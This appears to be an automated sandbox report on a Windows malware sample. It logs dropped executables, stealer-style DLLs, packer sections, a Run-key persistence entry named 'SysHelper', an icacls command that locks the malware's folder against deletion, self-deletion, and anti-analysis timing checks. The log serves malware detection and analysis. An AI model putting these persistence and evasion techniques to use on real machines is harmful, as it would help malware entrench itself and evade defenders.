          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3046.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3046.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\98D7.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\98D7.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\llpb1133.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\AppData\Local\Temp\llpb1133.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\AppData\Local\Temp\pliu.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\AppData\Local\Temp\pliu.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: C:\pewuhagedisene88\fafi.pdb source: explorer.exe, 00000004.00000003.361183875.0000000005940000.00000004.00000001.00020000.00000000.sdmp, 4113.exe, 0000000B.00000000.360714654.0000000000401000.00000020.00000001.01000000.00000008.sdmp
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 3046.exe, 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, 3046.exe, 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 3046.exe, 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: C:\mawevofi\bafiguhininuri-dejo\35\habeh\geremay\ciw53\bunogi.pdb source: ECFB.exe, 00000012.00000000.400900601.0000000000401000.00000020.00000001.01000000.00000010.sdmp
          Source: Binary string: C:\hukesonu\cab71\kedir\81\zu.pdb source: D8D3.exe, 00000013.00000000.402009575.0000000000401000.00000020.00000001.01000000.00000011.sdmp
          Source: Binary string: C:\jazoda-razo\layumedorefo\mebezub.pdb` source: E4.exe, 00000011.00000000.399408871.0000000000401000.00000020.00000001.01000000.0000000F.sdmp
          Source: Binary string: eFI,d(C:\vefodoxaxek-tape.pdb source: file.exe, 00000000.00000000.258374243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, sievwvt, 0000000C.00000000.363734478.0000000000401000.00000020.00000001.01000000.00000009.sdmp, sievwvt, 0000000C.00000002.603307781.0000000000401000.00000020.00000001.01000000.00000009.sdmp
          Source: Binary string: C:\jazoda-razo\layumedorefo\mebezub.pdb source: E4.exe, 00000011.00000000.399408871.0000000000401000.00000020.00000001.01000000.0000000F.sdmp
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 3046.exe, 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, 3046.exe, 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 3046.exe, 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: C:\min gaferovasomo\kimi wipeyumamu16\jigewenege.pdb source: explorer.exe, 00000004.00000003.365557509.000000000B700000.00000004.00000001.00020000.00000000.sdmp, 3046.exe, 0000000D.00000002.396339058.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 3046.exe, 0000000D.00000000.364021519.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 3046.exe, 0000000F.00000000.394852843.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 3046.exe, 00000021.00000000.447684089.0000000000401000.00000020.00000001.01000000.00000016.sdmp, 3046.exe, 00000021.00000002.509435765.0000000000401000.00000020.00000001.01000000.00000016.sdmp, 3046.exe, 00000023.00000002.603085985.0000000000401000.00000020.00000001.01000000.00000016.sdmp, 3046.exe, 00000023.00000000.461163499.0000000000401000.00000020.00000001.01000000.00000016.sdmp, 3046.exe, 00000027.00000002.514112881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 3046.exe, 00000027.00000000.466448303.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
          Source: Binary string: C:\vefodoxaxek-tape.pdb source: file.exe, 00000000.00000000.258374243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, sievwvt, 0000000C.00000000.363734478.0000000000401000.00000020.00000001.01000000.00000009.sdmp, sievwvt, 0000000C.00000002.603307781.0000000000401000.00000020.00000001.01000000.00000009.sdmp
          Source: Binary string: 3JC:\mawevofi\bafiguhininuri-dejo\35\habeh\geremay\ciw53\bunogi.pdb source: ECFB.exe, 00000012.00000000.400900601.0000000000401000.00000020.00000001.01000000.00000010.sdmp
          Source: Binary string: d:\administrator\desktop\apphttp\release\apphttp.pdb source: pliu.exe, 0000001B.00000000.437990419.000000000040E000.00000002.00000001.01000000.00000014.sdmp, pliu.exe, 0000001B.00000002.467843346.000000000040E000.00000002.00000001.01000000.00000014.sdmp

          Data Obfuscation

          barindex
          Source: C:\Users\user\AppData\Local\Temp\4113.exeUnpacked PE file: 11.2.4113.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\Temp\3046.exeUnpacked PE file: 15.2.3046.exe.400000.0.unpack
          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
          Source: C:\Users\user\AppData\Local\Temp\4113.exeUnpacked PE file: 11.2.4113.exe.400000.0.unpack .text:ER;.data:W;.guno:R;.jofolo:R;.nabog:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\AppData\Local\Temp\3046.exeUnpacked PE file: 15.2.3046.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\AppData\Local\Temp\E4.exeUnpacked PE file: 17.2.E4.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
          Source: C:\Users\user\AppData\Local\Temp\ECFB.exeUnpacked PE file: 18.2.ECFB.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040BA11 push ecx; ret 0_2_0040BA24
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00932DC0 push 6700D42Eh; retf 0_2_00932DCA
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00931F68 push 623D8A45h; retf 0_2_00931F6D
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_004363BD push esi; ret 11_2_004363C6
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_004139F8 push ecx; ret 11_2_00413A0B
          Source: 4113.exe.4.drStatic PE information: section name: .guno
          Source: 4113.exe.4.drStatic PE information: section name: .jofolo
          Source: 4113.exe.4.drStatic PE information: section name: .nabog
          Source: 98D7.exe.4.drStatic PE information: section name: _RDATA
          Source: 98D7.exe.4.drStatic PE information: section name: .vmp0
          Source: 98D7.exe.4.drStatic PE information: section name: .vmp1
          Source: llpb1133.exe.14.drStatic PE information: section name: _RDATA
          Source: llpb1133.exe.14.drStatic PE information: section name: .vmp0
          Source: llpb1133.exe.14.drStatic PE information: section name: .vmp1
          Source: XandETC.exe.14.drStatic PE information: section name: .xdata
          Source: nss3.dll.19.drStatic PE information: section name: .00cfg
          Source: msvcp140.dll.19.drStatic PE information: section name: .didat
          Source: mozglue.dll.19.drStatic PE information: section name: .00cfg
          Source: freebl3.dll.19.drStatic PE information: section name: .00cfg
          Source: softokn3.dll.19.drStatic PE information: section name: .00cfg
          Source: sqlite3.dll.19.drStatic PE information: section name: /4
          Source: sqlite3.dll.19.drStatic PE information: section name: /19
          Source: sqlite3.dll.19.drStatic PE information: section name: /31
          Source: sqlite3.dll.19.drStatic PE information: section name: /45
          Source: sqlite3.dll.19.drStatic PE information: section name: /57
          Source: sqlite3.dll.19.drStatic PE information: section name: /70
          Source: sqlite3.dll.19.drStatic PE information: section name: /81
          Source: sqlite3.dll.19.drStatic PE information: section name: /92
          Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp1
          Source: 98D7.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x383f10
          Source: pliu.exe.14.drStatic PE information: real checksum: 0x2b520 should be: 0x29e17
          Source: A33B.exe.4.drStatic PE information: real checksum: 0x0 should be: 0x76ad5c
          Source: llpb1133.exe.14.drStatic PE information: real checksum: 0x0 should be: 0x383f10

          Persistence and Installation Behavior

          barindex
          Source: C:\Users\user\AppData\Local\Temp\pliu.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\jhevwvtJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\sievwvtJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeFile created: C:\Users\user\AppData\LocalLow\nss3.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeFile created: C:\Users\user\AppData\LocalLow\vcruntime140.dllJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\3046.exeJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\98D7.exeJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\E4.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeFile created: C:\Users\user\AppData\Local\Temp\llpb1133.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeFile created: C:\Users\user\AppData\Local\Temp\pliu.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeFile created: C:\Users\user\AppData\LocalLow\msvcp140.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeFile created: C:\Users\user\AppData\LocalLow\freebl3.dllJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\jhevwvtJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D8D3.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\pliu.exeFile created: C:\Users\user\AppData\Local\Temp\db.dllJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\FB61.exeJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\ECFB.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeFile created: C:\Users\user\AppData\LocalLow\sqlite3.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeFile created: C:\Users\user\AppData\Local\Temp\XandETC.exeJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\sievwvtJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\3046.exeFile created: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exeJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\12C0.exeJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\4113.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeFile created: C:\Users\user\AppData\LocalLow\mozglue.dllJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A33B.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeFile created: C:\Users\user\AppData\LocalLow\softokn3.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\3046.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3046.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\file.exeJump to behavior
          Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\sievwvt:Zone.Identifier read attributes | deleteJump to behavior
          Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\jhevwvt:Zone.Identifier read attributes | deleteJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0" /deny *S-1-1-0:(OI)(CI)(DE,DC)
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\pliu.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: file.exe, 00000000.00000002.313456066.0000000000939000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
          Source: C:\Users\user\AppData\Local\Temp\98D7.exeRDTSC instruction interceptor: First address: 00000001405FFCC5 second address: 00000001405FFCCC instructions: 0x00000000 rdtsc 0x00000002 inc cl 0x00000004 rcr edx, 6Dh 0x00000007 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\98D7.exeRDTSC instruction interceptor: First address: 00000001405FFCCC second address: 00000001405FFCE7 instructions: 0x00000000 rdtsc 0x00000002 rcl dl, cl 0x00000004 ror cl, 1 0x00000006 mov dx, 05D0h 0x0000000a movzx ax, bl 0x0000000e sub cl, FFFFFFCCh 0x00000011 clc 0x00000012 neg cl 0x00000014 inc eax 0x00000015 xor bh, cl 0x00000017 setl dl 0x0000001a lahf 0x0000001b rdtsc
          Source: C:\Users\user\AppData\Local\Temp\llpb1133.exeRDTSC instruction interceptor: First address: 00000001405FFCC5 second address: 00000001405FFCCC instructions: 0x00000000 rdtsc 0x00000002 inc cl 0x00000004 rcr edx, 6Dh 0x00000007 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\llpb1133.exeRDTSC instruction interceptor: First address: 00000001405FFCCC second address: 00000001405FFCE7 instructions: 0x00000000 rdtsc 0x00000002 rcl dl, cl 0x00000004 ror cl, 1 0x00000006 mov dx, 05D0h 0x0000000a movzx ax, bl 0x0000000e sub cl, FFFFFFCCh 0x00000011 clc 0x00000012 neg cl 0x00000014 inc eax 0x00000015 xor bh, cl 0x00000017 setl dl 0x0000001a lahf 0x0000001b rdtsc
          Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\E4.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\E4.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\E4.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\E4.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\E4.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\E4.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Windows\explorer.exe TID: 3568Thread sleep time: -450000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\A33B.exe TID: 2992Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\98D7.exe TID: 5164Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\pliu.exe TID: 3516Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\pliu.exe TID: 4604Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\98D7.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 410Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 447Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 855Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 842Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\freebl3.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\pliu.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\db.dllJump to dropped file
          Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\FB61.exeJump to dropped file
          Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\12C0.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\softokn3.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeRegistry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: 98D7.exe, 00000010.00000002.602257740.00000000004F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 